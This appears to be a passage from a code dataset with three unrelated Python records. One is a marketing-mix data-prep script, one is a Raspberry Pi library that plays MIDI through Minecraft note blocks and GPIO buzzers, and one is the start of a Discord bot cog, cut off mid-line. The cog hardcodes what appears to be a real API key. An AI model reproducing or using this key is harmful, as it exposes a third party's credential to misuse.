range(5)]\nBinary_List_2_17=[datetime.date(2017,11,19)+datetime.timedelta(days=x*7) for x in range(5)]\nBinary_List_2=Binary_List_2_16+Binary_List_2_17\n\nMMM_national_media['Holiday_1_week_only_Ind']=np.where(np.isin(MMM_national_media['week date'],Binary_List_1),1,0)\nMMM_national_media['Holiday_5_weeks_Indicator']=np.where(np.isin(MMM_national_media['week date'],Binary_List_2),1,0)\n\nMMM_dma_media['Holiday_1_week_only_Ind']=np.where(np.isin(MMM_dma_media['week date'],Binary_List_1),1,0)\nMMM_dma_media['Holiday_5_weeks_Indicator']=np.where(np.isin(MMM_dma_media['week date'],Binary_List_2),1,0)\n\nMMM_national_sub_media['Holiday_1_week_only_Ind']=np.where(np.isin(MMM_national_sub_media['week date'],Binary_List_1),1,0)\nMMM_national_sub_media['Holiday_5_weeks_Indicator']=np.where(np.isin(MMM_national_sub_media['week date'],Binary_List_2),1,0)\n\nMMM_dma_sub_media['Holiday_1_week_only_Ind']=np.where(np.isin(MMM_dma_sub_media['week date'],Binary_List_1),1,0)\nMMM_dma_sub_media['Holiday_5_weeks_Indicator']=np.where(np.isin(MMM_dma_sub_media['week date'],Binary_List_2),1,0)\n\n\n# In[ ]:\n\nMMM_dma_sub_media.head(2)\n\n\n# In[ ]:\n\n# Add the sales 20% dummy variables\nRewards_Promotion_list=[datetime.date(2016,10,1),datetime.date(2016,10,2),\n datetime.date(2017,1,21),datetime.date(2017,1,22),\n datetime.date(2017,4,1),datetime.date(2017,4,2),\n datetime.date(2017,7,8),datetime.date(2017,7,9),\n datetime.date(2017,9,30),datetime.date(2017,10,1),\n datetime.date(2018,1,20),datetime.date(2018,1,21),\n datetime.date(2018,4,7),datetime.date(2018,4,8),\n datetime.date(2018,7,7),datetime.date(2018,7,8)]\ndf_Rewards_Promotion=pd.DataFrame({\"Date\":Rewards_Promotion_list},index=range(len(Rewards_Promotion_list)))\ndf_Rewards_Promotion['weekday']=df_Rewards_Promotion['Date'].apply(lambda x: x.weekday())\ndf_Rewards_Promotion['week date']=np.where(df_Rewards_Promotion['weekday']==6,df_Rewards_Promotion['Date'],df_Rewards_Promotion['Date']-datetime.timedelta(days=6))\n\ndel df_Rewards_Promotion['Date']\n\ndf_Rewards_Promotion_Sunday=df_Rewards_Promotion[df_Rewards_Promotion['weekday']==6]\ndf_Rewards_Promotion_Sunday['Sunday_rewards_ind']=1\ndel df_Rewards_Promotion_Sunday['weekday']\ndf_Rewards_Promotion_Saturday=df_Rewards_Promotion[df_Rewards_Promotion['weekday']==5]\ndf_Rewards_Promotion_Saturday['Saturday_rewards_ind']=1\ndel df_Rewards_Promotion_Saturday['weekday']\n\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\nMMM_national_media=pd.merge(MMM_national_media,df_Rewards_Promotion_Saturday,on=\"week date\",how=\"left\")\nMMM_national_media=pd.merge(MMM_national_media,df_Rewards_Promotion_Sunday,on=\"week date\",how=\"left\")\nMMM_national_media=MMM_national_media.fillna(0)\n\nMMM_dma_media=pd.merge(MMM_dma_media,df_Rewards_Promotion_Saturday,on=\"week date\",how=\"left\")\nMMM_dma_media=pd.merge(MMM_dma_media,df_Rewards_Promotion_Sunday,on=\"week date\",how=\"left\")\nMMM_dma_media=MMM_dma_media.fillna(0)\n\nMMM_national_sub_media=pd.merge(MMM_national_sub_media,df_Rewards_Promotion_Saturday,on=\"week date\",how=\"left\")\nMMM_national_sub_media=pd.merge(MMM_national_sub_media,df_Rewards_Promotion_Sunday,on=\"week date\",how=\"left\")\nMMM_national_sub_media=MMM_national_sub_media.fillna(0)\n\nMMM_dma_sub_media=pd.merge(MMM_dma_sub_media,df_Rewards_Promotion_Saturday,on=\"week date\",how=\"left\")\nMMM_dma_sub_media=pd.merge(MMM_dma_sub_media,df_Rewards_Promotion_Sunday,on=\"week date\",how=\"left\")\nMMM_dma_sub_media=MMM_dma_sub_media.fillna(0)\n\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\nMMM_national_media.to_csv(writer_folder+\"BL_MMM_national_media_JL_\"+today_str+\".csv\",index=False)\nMMM_dma_media.to_csv(writer_folder+\"BL_MMM_dma_media_JL_\"+today_str+\".csv\",index=False)\nMMM_national_sub_media.to_csv(writer_folder+\"BL_MMM_national_sub_media_JL_\"+today_str+\".csv\",index=False)\nMMM_dma_sub_media.to_csv(writer_folder+\"BL_MMM_dma_sub_media_JL_\"+today_str+\".csv\",index=False)\n\n\n# In[ ]:\n\ndata_Joann.to_csv(writer_folder+\"BL_MMM_long_JL_\"+today_str+\".csv\",index=False)\n\n\n# In[ ]:\n\n\n\n","repo_name":"jubaplus2/jian_projects","sub_path":"code_back_up/backuped_on_sharefolder_2021-01-06_000/00498_TMR_2018Q2_20181026.py","file_name":"00498_TMR_2018Q2_20181026.py","file_ext":"py","file_size_in_byte":22224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"35791729126","text":"# -*- coding: utf-8 -*-\n\nfrom config import NULL\n\nimport RPi.GPIO as GPIO\n\n# MCAPI\nfrom mcpi import block\n\n# EventKind\nfrom enum import Enum, auto\n\n# MIDINotes\nimport os\nimport time\nfrom collections import defaultdict\n#from multiprocessing import Process as Proc, SimpleQueue as Queue\nfrom threading import Thread as Proc\nfrom queue import Queue\nimport midi\n\nC2 = 2 ** (1/3)\nC4 = 4 ** (1/3)\nNOTE_12 = [1, 16384*C2/19683, 8*C2/9, 32/27,\n64*C4/81, 4/3, 1024/729, 32*C2/27, 8192*C2/6561, 256*C4/243, 9/(4*C2), 4096/2187]\n\n#NOTES = [440 * (2 ** ((note - 69)/12)) for note in range(120)]\nNOTES = [261.6255653 * (2 ** ((note-60) // 12)) * NOTE_12[note % 12] for note in range(120)]\n\nclass LocalAPI:\n\tdef __init__(self, *args, **kwargs):\n\t\tself.pr = False\n\t\tif 'pr' in kwargs:\n\t\t\tself.pr = kwargs[pr]\n\n\tdef play_note(self, note, on):\n\t\tif self.pr:\n\t\t\tprint(\"Turn {} note {} in MC.\".format('on' if on else 'off', note))\n\n\tdef print(self, msg):\n\t\tprint(\"MC: {}\".format(msg))\n\nclass MCAPI:\n\tNB_ID = block.NOTEBLOCK.id\n\tRS_ID = block.REDSTONE_BLOCK.id\n\tEMPTY_ID = block.AIR.id\n\n\tLOW_ID = block.WOOD.id\n\tHIGH_ID = block.GOLD_BLOCK.id\n\n\tNOTE_NUM = 72 + 1\n\n\tdef __init__(self, mc, x, y, z, pr = False): # pr: For compatibility.\n\t\tself.mc = mc\n\t\tself.pl = mc.player\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.z = z\n\t\tself.init()\n\n\tdef init(self):\n\t\tx, y, z, mc = self.x, self.y, self.z, self.mc\n\t\tmc.setBlocks(x, y - 1, z - 2, x + 24, y + 1, z + 2, self.EMPTY_ID)\n\t\tmc.setBlocks(x, y - 1, z - 1, x + 24, y - 1, z - 1, self.LOW_ID)\n\t\tmc.setBlocks(x, y - 1, z + 1, x + 24, y - 1, z + 1, self.HIGH_ID)\n\t\tfor note in range(25):\n\t\t\tfor i in (-1, 0, 1):\n\t\t\t\tmc.setBlockWithNBT(x + note, y, z + i, self.NB_ID, 0, '{note:%d}' % note)\n\t\t'''\n\t\tmc.setBlocks(x, y - 4, z - 1, x + 24, y + 4, z + 1, 0)\n\t\tmc.setBlocks(x, y - 4, z, x + 24, y - 4, z, LOW_ID)\n\t\tmc.setBlocks(x, y + 2, z, x + 24, y + 2, z, HIGH_ID)\n\t\tfor note in range(25):\n\t\t\tfor i in [-3, 0, 3]:\n\t\t\t\tmc.setBlockWithNBT(x + note, y + i, z, NB_ID, 0, '{note:%d}' % note)\n\t\t'''\n\t\t'''\n\t\tfor note in range(NOTE_NUM):\n\t\t\tmc.setBlockWithNBT(x + note, y, z, NB_ID, 0, '{note:%d}' % note)\n\t\t'''\n\n\tdef rb_pos(self, note):\n\t\ty_shift = 0\n\t\tz_shift = 0\n\t\tif note < 24:\n\t\t\t#y_shift = -3\n\t\t\ty_shift = 0\n\t\t\tz_shift = -2\n\t\telif note < 49:\n\t\t\tnote -= 24\n\t\t\t#y_shift = 0\n\t\t\ty_shift = -1\n\t\t\tz_shift = 0\n\t\telse:\n\t\t\tnote -= 48\n\t\t\t#y_shift = 3\n\t\t\ty_shift = 0\n\t\t\tz_shift = 2\n\n\t\treturn self.x + note, self.y + y_shift, self.z + z_shift\n\n\tdef play_note(self, note, on):\n\t\tself.mc.setBlock(*self.rb_pos(note), self.RS_ID if on else self.EMPTY_ID)\n\n\tdef print(self, msg):\n\t\tpls = self.mc.getPlayerEntityIds()\n\t\thasP = False\n\t\tfor pid in pls:\n\t\t\ttry:\n\t\t\t\tpl = CmdPlayer(self.mc.conn, playerId=pid)\n\t\t\t\tpos = pl.getTilePos()\n\t\t\t\tif pos.x<95 and pos.x>35 and pos.y<30 and pos.z<195 and pos.z>125:\n\t\t\t\t\tself.mc.postToChat(msg)\n\t\t\texcept Exception:\n\t\t\t\tpass\n\nclass EventKind(Enum):\n\tMC = auto()\n\tBUZZER = auto()\n\tLYRIC = auto()\n\nclass MIDINotes:\n\t\"\"\"Extracts note info from MIDIFile\"\"\"\n\tdef __init__(self, file, same_note = True):\n\t\tself.same_note = same_note\n\t\tself._valid = True\n\t\ttry:\n\t\t\tself.process(file)\n\t\texcept Exception as e:\n\t\t\tprint(\"[MIDINotes] Exception occured while processing '{}':\\n\\t{}\".format(file, e))\n\t\t\tself._valid = False\n\n\t@staticmethod\n\tdef merge(ch_dicts):\n\t\t# Input : list of \"{note:[(t, is_on)...]}\"\n\t\tnotes = {}\n\t\tfor ch_dict in ch_dicts:\n\t\t\tnotes |= ch_dict.keys()\n\t\tmerged_dict = {n : [] for n in notes}\n\t\tfor note in notes:\n\t\t\tml = merged_dict[note]\n\t\t\tnlist = [(t, not is_on, i) for i, ch_dict in enumerate(ch_dicts) \\\n\t\t\t\t\t\t\t\t\t\tfor t, is_on in ch_dict.get(note, [])]\n\t\t\tnlist.sort()\n\t\t\ton_channel = set()\n\t\t\tlast_t = -1\n\t\t\tfor t, is_off, i in nlist:\n\t\t\t\tif is_off:\n\t\t\t\t\tassert i in on_channel, \"Error: note {} is off before on!\".format(note)\n\t\t\t\t\ton_channel.remove(i)\n\t\t\t\t\tif not on_channel:\n\t\t\t\t\t\tml.append((t, False))\n\t\t\t\t\t\tassert last_t < t, \"Error: internal error with code 1.\"\n\t\t\t\telse:\n\t\t\t\t\ton_channel.add(i)\n\t\t\t\t\tif last_t < t:\n\t\t\t\t\t\tml.append((t, True))\n\t\t\t\t\t\tlast_t = t\n\n\t\treturn merged_dict\n\n\tdef get_time(self, tick):\n\t\treal_time = 0\n\t\tlast_t, last_r = self.tempos[0]\n\t\tfor t, ratio in self.tempos[1:]:\n\t\t\tif t >= tick:\n\t\t\t\tbreak\n\t\t\treal_time += (t - last_t) * last_r\n\t\t\tlast_t, last_r = t, ratio\n\t\treal_time += (tick - last_t) * last_r\n\t\treturn real_time\n\n\tdef process(self, file):\n\t\traw_midi = midi.read_midifile(file)\n\t\tself.res = raw_midi.resolution\n\t\traw_midi.make_ticks_abs()\n\n\t\ttempos = dict()\n\t\tfor track in raw_midi:\n\t\t\tfor e in track:\n\t\t\t\tif isinstance(e, midi.SetTempoEvent):\n\t\t\t\t\tspt = 60 / (e.get_bpm() * self.res)\n\t\t\t\t\tt = e.tick\n\t\t\t\t\tif t in tempos:\n\t\t\t\t\t\tassert tempos[t] == spt, \\\n\t\t\t\t\t\t'Found different tempos at the same time'\\\n\t\t\t\t\t\t'{}: {} and {}'.format(t, tempos[t], spt)\n\t\t\t\t\telse:\n\t\t\t\t\t\ttempos[t] = spt\n\n\t\tassert 0 in tempos, \"No speed at tick 0!\"\n\t\tself.tempos = sorted(tempos.items())\n\n\t\tchannel_dicts = defaultdict(lambda:defaultdict(lambda:defaultdict(set)))\n\t\tmax_t = -1\n\t\tfor track in raw_midi:\n\t\t\tfor e in track:\n\t\t\t\tif not (isinstance(e, midi.NoteOnEvent) or isinstance(e, midi.NoteOffEvent)):\n\t\t\t\t\tcontinue\n\n\t\t\t\tt = self.get_time(e.tick)\n\t\t\t\tmax_t = max(max_t, t)\n\t\t\t\tpitch = e.get_pitch()\n\t\t\t\tis_on = isinstance(e, midi.NoteOnEvent) and e.get_velocity() > 0\n\t\t\t\tch = e.channel\n\n\t\t\t\tchannel_dicts[ch][pitch][t]=is_on\n\n\t\tassert max_t > 0, \"No pitch detected!\"\n\t\tself.max_t = max_t + 1\n\t\tself.ch_dicts = [\n\t\t\t{p: sorted(defd.items()) for p, defd in channel_dicts[ch].items()}\n\t\t\tfor ch in sorted(channel_dicts)]\n\t\tfor cd in self.ch_dicts:\n\t\t\tremove_notes = []\n\t\t\tfor p in cd:\n\t\t\t\tls = []\n\t\t\t\tlast_on = False\n\t\t\t\tfor t, is_on in cd[p]:\n\t\t\t\t\tif is_on == False and last_on == False:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tls.append((t, is_on))\n\t\t\t\t\tlast_on = is_on\n\t\t\t\tif not ls:\n\t\t\t\t\tremove_notes.append(p)\n\t\t\t\telse:\n\t\t\t\t\tcd[p] = ls\n\t\t\tfor p in remove_notes:\n\t\t\t\tdel cd[p]\n\n\t\tself.ch_dicts = [c for c in self.ch_dicts if c]\n\n\t\t#print(len(self.ch_dicts))\n\t\tassert self.ch_dicts, \"Error! No note detected.\"\n\t\tassert all(p[-1][-1] == False for d in self.ch_dicts for p in d.values()),\\\n\t\t\"Error! Pitch not ended.\"\n\n\t\tself.merged_cd = MIDINotes.merge(self.ch_dicts)\n\t\t#print(self.mc_events())\n\n\t\tself.lyrics = []\n\n\t\tx = file.rfind('.')\n\t\ttext_name = file[:x] + '.txt'\n\t\tself.font = None\n\t\tself.font_size = None\n\t\tif os.path.isfile(text_name):\n\t\t\twith open(text_name, 'r', encoding = 'utf-8') as f:\n\t\t\t\ttext_list = []\n\t\t\t\tfor line in f.readlines():\n\t\t\t\t\tif line[-1] == '\\n':\n\t\t\t\t\t\tline = line[:-1]\n\t\t\t\t\tif line == '' or line[0] == '#':\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif line.startswith('font: '):\n\t\t\t\t\t\tself.font = line[6:]\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif line.startswith('font_size: '):\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tself.font_size = int(line[11:])\n\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\tprint(\"[MIDINotes] Error in font_size: can't convert \\\"{}\\\" to int.\".format(line[11:]))\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tr = line.find('\\t')\n\t\t\t\t\tif r == -1:\n\t\t\t\t\t\tprint(\"[MIDINotes] Error in lyric: can't find tab in \\\"{}\\\"\".format(line))\n\t\t\t\t\t\tcontinue\n\t\t\t\t\ttry:\n\t\t\t\t\t\tnbeat = float(line[:r])\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\tprint(\"[MIDINotes] Error in lyric: can't convert \\\"{}\\\" to float.\".format(line[:r]))\n\t\t\t\t\t\tcontinue\n\t\t\t\t\ttext_list.append((self.get_time(nbeat * self.res), line[r+1:]))\n\t\t\t\tself.lyrics = [(t, txt, None, EventKind.LYRIC, 0) for t, txt in text_list]\n\n\tdef lyric_events(self):\n\t\treturn self.lyrics\n\n\tdef mc_events(self):\n\t\tnote_list = []\n\t\tnotes = self.merged_cd.keys()\n\n\t\tmax_note = max(notes)\n\t\tmin_note = min(notes)\n\t\tNOTE_NUM = MCAPI.NOTE_NUM\n\t\tif self.same_note:\n\t\t\tzero_note = 30 # F#1 = 30 in midi\n\t\t\tif min_note < zero_note or max_note >= zero_note + NOTE_NUM:\n\t\t\t\tprint('Warning: The variety of the song is too large, can only play a part!')\n\t\telse:\n\t\t\tavan_list = []\n\t\t\tlen_dict = defaultdict(int)\n\t\t\tlen_dict.update((x, len(self.merged_cd[x])) for x in notes)\n\t\t\tif max_note - min_note >= NOTE_NUM:\n\t\t\t\tfor n in range(min_note, max_note - NOTE_NUM + 2):\n\t\t\t\t\tavan = sum(len_dict[i] for i in range(n, n+NOTE_NUM))\n\t\t\t\t\tavan_list.append((avan, n))\n\t\t\t\tavan_list.sort()\n\t\t\t\tzero_note = avan_list[-1][-1]\n\t\t\t\tprint('Warning: The variety of the song is too large, can only play a part!')\n\t\t\telse:\n\t\t\t\tzero_note = (min_note + max_note - NOTE_NUM + 1) // 2\n\n\t\tfor p in notes:\n\t\t\tif p < zero_note or p >= zero_note + NOTE_NUM:\n\t\t\t\tcontinue\n\t\t\tts = sorted(self.merged_cd[p])\n\t\t\tp -= zero_note\n\t\t\tlast_t = ts[0][0]\n\t\t\tassert ts[0][1], \"First note is off!\"\n\t\t\tnote_list.append((last_t, p, True, EventKind.MC, 0))\n\t\t\tlast_off = None\n\t\t\tfor t in ts[1:]:\n\t\t\t\tif not t[1]:\n\t\t\t\t\tif last_off is None:\n\t\t\t\t\t\tlast_off = t[0]\n\t\t\t\t\tcontinue\n\t\t\t\tt = t[0]\n\t\t\t\t# As short as possible\n\t\t\t\tt_end = last_t + min(0.25, (t - last_t) / 2)\n\t\t\t\tif last_off is not None:\n\t\t\t\t\tt_end = min(t_end, last_off)\n\t\t\t\t\tlast_off = None\n\t\t\t\tnote_list.append((t_end, p, False, EventKind.MC, 0))\n\t\t\t\tnote_list.append((t, p, True, EventKind.MC, 0))\n\t\t\t\tlast_t = t\n\t\t\tassert not ts[-1][1], \"Last note is on!\"\n\t\t\tnote_list.append((ts[-1][0], p, False, EventKind.MC, 0))\n\n\t\treturn note_list\n\n\tdef buzz_events(self):\n\t\t# ch_dicts : list of \"{note:[(t, is_on)...]}\"\n\n\t\tnotes = [(t, not is_on, -note, ch) \\\n\t\t\t\t\tfor ch, ch_dict in enumerate(self.ch_dicts) \\\n\t\t\t\t\tfor note, lst in ch_dict.items() \\\n\t\t\t\t\tfor t, is_on in lst\n\t\t\t\t]\n\t\tnotes.sort()\n\n\t\tbuzz_list = []\n\t\tnote_to_bch = dict()\n\t\tlast_time = dict()\n\t\tava_bch = set()\n\t\tnum_bch = 0\n\n\t\tfor t, is_off, mnote, ch in notes:\n\t\t\tnote = -mnote\n\t\t\tcur_bch = None\n\t\t\tif is_off:\n\t\t\t\tcur_bch = note_to_bch.pop((note, ch), None)\n\t\t\t\tif cur_bch is None:\n\t\t\t\t\tcontinue\n\t\t\t\tdel last_time[(note, ch)]\n\t\t\t\tava_bch.add(cur_bch)\n\t\t\telif (note, ch) in note_to_bch:\n\t\t\t\tcur_bch = note_to_bch[(note, ch)]\n\t\t\t\tmin_stime = (t + last_time[(note, ch)]) * 0.5\n\t\t\t\tlast_t = max(min_stime, t - 0.1)\n\t\t\t\tbuzz_list.append((last_t, note, False, EventKind.BUZZER, cur_bch))\n\t\t\t\tlast_time[(note, ch)] = t\n\t\t\t\tif ava_bch:\n\t\t\t\t\tnext_bch = min(ava_bch)\n\t\t\t\t\tava_bch.remove(next_bch)\n\t\t\t\t\tava_bch.add(cur_bch)\n\t\t\t\t\tcur_bch = next_bch\n\t\t\t\t\tnote_to_bch[(note, ch)] = cur_bch\n\t\t\telse:\n\t\t\t\tif ava_bch:\n\t\t\t\t\tcur_bch = min(ava_bch)\n\t\t\t\t\tava_bch.remove(cur_bch)\n\t\t\t\telse:\n\t\t\t\t\tcur_bch = num_bch\n\t\t\t\t\tnum_bch += 1\n\t\t\t\tnote_to_bch[(note, ch)] = cur_bch\n\t\t\t\tlast_time[(note, ch)] = t\n\t\t\tbuzz_list.append((t, note, not is_off, EventKind.BUZZER, cur_bch))\n\n\t\t#print(\"{} buzzers needed...\".format(num_bch))\n\n\t\treturn buzz_list\n\n\t@property\n\tdef valid(self):\n\t\treturn self._valid\n\n\t@property\n\tdef length(self):\n\t\treturn self.max_t\n\n\t@property\n\tdef lyric_font(self):\n\t\tif self.font_size is None:\n\t\t\treturn self.font\n\t\treturn (self.font, self.font_size)\n\n\tdef full_events(self, buzz_pfunc):\n\t\tbuzz_evt, nch = buzz_pfunc(self.buzz_events())\n\t\tnote_list = self.mc_events() + self.lyric_events() + buzz_evt\n\t\tnote_list.sort(key = lambda x:(x[0], x[1] if isinstance(x[1],int) else -1, -1 if x[2] is None else int(x[2]), x[3].value, x[4]))\n\t\treturn note_list, nch\n\n\t@staticmethod\n\tdef play(note_list, mc = None, buz = None, oled_q = None):\n\t\tt0 = time.time()\n\t\tlast_t = 0\n\n\t\tfor t, note, on, kind, channel in note_list:\n\t\t\t#print(note, t, on)\n\t\t\tif t > last_t:\n\t\t\t\ttime.sleep(max(t0 + t - time.time(), 0))\n\t\t\t\tlast_t = t\n\n\t\t\tif kind == EventKind.MC:\n\t\t\t\tmc.play_note(note, on)\n\t\t\telif kind == EventKind.BUZZER:\n\t\t\t\tbuz.play_note(note, on, channel)\n\t\t\telif kind == EventKind.LYRIC:\n\t\t\t\tmc.print(note)\n\t\t\t\toled_q.put(note)\n\n\t\toled_q.put('')\n\t\tbuz.reset()\n\nclass MultiBuzzer:\n\tdef __init__(self, pins):\n\t\t'''\n\t\tThe following implementation is deprecated.\n\t\tIt will have lower frequency pitch (may be caused by software delays).\n\n\t\tNotice that RPi.GPIO cannot control hardware PWMs,\n\t\tand thus GPIO.PWM runs on software PWM.\n\n\t\tThe reason not using hardware PWM is that there are too few of them:\n\t\tWe ONLY have TWO PWMs on a raspi 3B+ !!!\n\n\t\tLet's just write our own PWM instead...\n\n\t\tdef gpio_thread(pin, q):\n\t\t\tp = GPIO.PWM(pin, 440)\n\t\t\tcur_freq = q.get()\n\t\t\twhile cur_freq is not None:\n\t\t\t\tif cur_freq != -1:\n\t\t\t\t\tp.ChangeFrequency(cur_freq)\n\t\t\t\t\tp.start(50)\n\t\t\t\tcur_freq = q.get()\n\t\t\t\tp.stop()\n\t\t\tdel p\n\t\t'''\n\n\t\tdef gpio(pin, q):\n\t\t\t# GPIO.output(pin, GPIO.LOW)\n\t\t\tcur_freq = -1\n\t\t\tcur_stat = GPIO.LOW\n\t\t\tt = 0\n\t\t\twhile True:\n\t\t\t\twhile cur_freq == -1:\n\t\t\t\t\tcur_freq = q.get()\n\n\t\t\t\tif cur_freq is None:\n\t\t\t\t\tbreak\n\n\t\t\t\thcyc = 0.5 / cur_freq\n\t\t\t\tt = time.time()\n\t\t\t\twhile q.empty():\n\t\t\t\t\tt += hcyc\n\t\t\t\t\tcur_stat = GPIO.HIGH if cur_stat == GPIO.LOW else GPIO.LOW\n\t\t\t\t\ttime.sleep(max(t - time.time(), 0))\n\t\t\t\t\tGPIO.output(pin, cur_stat)\n\t\t\t\tcur_freq = q.get()\n\n\t\tGPIO.setmode(GPIO.BCM)\n\t\tGPIO.setwarnings(False)\n\t\tself.pins = pins\n\t\tfor p in pins:\n\t\t\tGPIO.setup(p, GPIO.OUT, initial=GPIO.LOW)\n\t\tself.queues = [Queue() for _ in pins]\n\t\tself.processes = [Proc(target = gpio, args=(pin, q)) for pin, q in zip(pins, self.queues)]\n\t\tfor p in self.processes:\n\t\t\tp.start()\n\n\tdef play_note(self, note, is_on, ch):\n\t\tself.queues[ch].put(NOTES[note] if is_on else -1)\n\n\tdef reset(self):\n\t\tfor q in self.queues:\n\t\t\tq.put(-1)\n\n\t\tfor q in self.queues:\n\t\t\twhile not q.empty():\n\t\t\t\tpass\n\n\tdef stop(self):\n\t\tfor q in self.queues:\n\t\t\tq.put(None)\n\t\tfor p in self.processes:\n\t\t\tp.join()\n\n\tdef proc_buz(self, buzz_list):\n\t\tch_num = max(b[-1] for b in buzz_list) + 1\n\t\tpnum = len(self.pins)\n\t\tif ch_num > pnum:\n\t\t\tprint(\"[MultiBuzzer] Warning: Needs {} channels but only have {}\".format(ch_num, pnum))\n\t\treturn [b for b in buzz_list if b[-1] < pnum], ch_num\n\n'''\nclass MultiBuzzer2:\n\tdef __init__(self, pins):\n\t\tGPIO.setmode(GPIO.BCM)\n\t\tGPIO.setwarnings(False)\n\t\tself.pins = pins\n\t\tfor p in pins:\n\t\t\tGPIO.setup(p, GPIO.OUT, initial=GPIO.LOW)\n\n\tdef play_note(self, note, is_on, ch):\n\t\tGPIO.output(ch, is_on)\n\n\tdef reset(self):\n\t\tpass\n\n\tdef stop(self):\n\t\tpass\n\n\tdef proc_buz(self, buzz_list):\n\t\tdef try_add(cur_list, last_t, on, bch, delta):\n\t\t\tbch = self.pins[bch]\n\t\t\ton = GPIO.HIGH if on else GPIO.LOW\n\t\t\tif not cur_list:\n\t\t\t\tcur_list.append((last_t, -1, on, EventKind.BUZZER, bch))\n\t\t\t\treturn\n\n\t\t\tst = 0\n\t\t\ted = len(cur_list)\n\t\t\twhile st < ed:\n\t\t\t\tmd = (st + ed) // 2\n\t\t\t\tnmd = cur_list[md][0]\n\t\t\t\tif nmd < last_t - delta:\n\t\t\t\t\tst = md + 1\n\t\t\t\telif nmd > last_t + delta:\n\t\t\t\t\ted = md\n\t\t\t\telse:\n\t\t\t\t\tlast_t = nmd\n\t\t\t\t\tst = md + 1\n\t\t\t\t\tbreak\n\t\t\tcur_list.insert(st, (last_t, -1, on, EventKind.BUZZER, bch))\n\n\t\tif not buzz_list:\n\t\t\treturn buzz_list\n\t\tbuzz_list.sort()\n\t\tnum_ch = max(i[-1] for i in buzz_list) + 1\n\t\t_num_ch = num_ch\n\t\tpnum = len(self.pins)\n\t\tif num_ch > pnum:\n\t\t\tprint(\"[MultiBuzzer2] Warning: Needs {} channels but only have {}\".format(num_ch, pnum))\n\t\t\tnum_ch = pnum\n\t\tnew_blist = []\n\t\tfor ch in range(num_ch):\n\t\t\tprint(\"Processing ch {}/{}\".format(ch, num_ch))\n\t\t\tlast_t = -1\n\t\t\tlast_note = None\n\t\t\tcur_stat = False\n\t\t\tfor t, note, on, _, bch in buzz_list:\n\t\t\t\tif bch != ch:\n\t\t\t\t\tcontinue\n\t\t\t\tif last_note is not None:\n\t\t\t\t\thcyc = 0.5 / last_note\n\t\t\t\t\twhile last_t < t:\n\t\t\t\t\t\ttry_add(new_blist, last_t, cur_stat, bch, hcyc / 300)\n\t\t\t\t\t\tlast_t += hcyc\n\t\t\t\t\t\tcur_stat = not cur_stat\n\n\t\t\t\tif not on:\n\t\t\t\t\tassert NOTES[note] == last_note\n\t\t\t\t\tlast_note = None\n\t\t\t\telse:\n\t\t\t\t\tlast_note = NOTES[note]\n\t\t\t\t\tlast_t = t\n\t\t\tassert last_note is None\n\t\treturn new_blist, _num_ch\n'''\n","repo_name":"RyanWei0224/WinterOlymProject","sub_path":"lib/music_lib.py","file_name":"music_lib.py","file_ext":"py","file_size_in_byte":15027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9680867530","text":"from discord.ext import commands\nimport discord\nfrom deep_translator import GoogleTranslator\nfrom rivalapi.rivalapi import RivalAPI\nfrom utils.paginator import Paginator\nimport re\nfrom utils.embed import to_object, embed_replacement\nfrom typing import Union\n\ncolor = 0x2b2d31\n\nclass Miscellaneous(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n self.rival=RivalAPI('63176c61-4622-4f42-8eaf-76f93f7841a3')\n\n @commands.Cog.listener()\n async def on_ready(self):\n print(f\"{self.__class__.__name__} cog has been loaded\\n-----\")\n\n @commands.command(\n name='invite',\n description='View the bot invite',\n usage='Syntax: invite',\n aliases=['inv']\n )\n async def invite(self, ctx):\n await ctx.typing()\n\n inv = 'https://discord.com/api/oauth2/authorize?client_id=1075226332935503913&permissions=8&scope=bot'\n await ctx.success(f'Click **[here]({inv})** to invite **{self.bot.user.name}**')\n\n @commands.command(\n name='afk',\n description='Set you away message for when you\\'re mentioned',\n brief='status',\n usage='Syntax: <status>',\n aliases=['sleep', 'away']\n )\n async def afk(self, ctx, *, status: str = 'AFK'):\n await ctx.typing()\n\n timestamp = int(round(discord.utils.utcnow().timestamp()))\n await self.bot.db.execute('INSERT INTO afk (author, status, timestamp) VALUES ($1, $2, $3)', ctx.author.id, status, timestamp)\n await ctx.success(f'You\\'re now **AFK** with the status: **{status}**')\n\n @commands.command(\n name='translate',\n description='Transalte any text to a different language',\n brief='language, text',\n usage=\n 'Syntax: (language) (text)\\n'\n 'Example: spanish How are you?'\n )\n async def translate(self, ctx, language: str, *, text: str):\n await ctx.typing()\n\n trans=GoogleTranslator(\n source='auto',\n target=language\n )\n await ctx.success(trans.translate(text=text))\n \n @commands.command(\n name='image',\n description='Search Google for an image',\n brief='query',\n usage=\n 'Syntax: image (query)\\n'\n 'Example: J. Cole',\n aliases=['img', 'i', 'im']\n )\n async def image(self, ctx, *, query):\n await ctx.typing()\n\n data = await self.rival.google_images(query=query, safe=True)\n embeds = []\n for pagenum,i in enumerate(data.results,start=1):\n total=len(data.results)\n embeds.append(discord.Embed(\n color=color,\n title=f'{query}',\n description=f\"[{i.title}]({i.domain})\",url=i.source).set_image(url=i.url)\n .set_author(name=ctx.author.display_name, icon_url=ctx.author.display_avatar)\n .set_footer(text=f'Page {pagenum}/{total}')\n )\n pag = Paginator(self.bot, embeds, ctx, invoker=ctx.author.id)\n pag.add_button('prev', emoji='<:void_previous:1082283002207424572>')\n pag.add_button('goto', emoji='<:void_goto:1082282999187517490>')\n pag.add_button('next', emoji='<:void_next:1082283004321341511>')\n pag.add_button('delete', emoji='<:void_cross:1082283006649188435>')\n await pag.start()\n \n # @commands.command(\n # name='lookup',\n # description='Look up recently changed usernames',\n # brief='discriminator',\n # usage=\n # 'Syntax: <discriminator>\\n'\n # 'Example: 9999',\n # aliases=['tags']\n # )\n # async def lookup(self, ctx, lookup = None):\n # await ctx.typing()\n\n # lookup = '0001' if 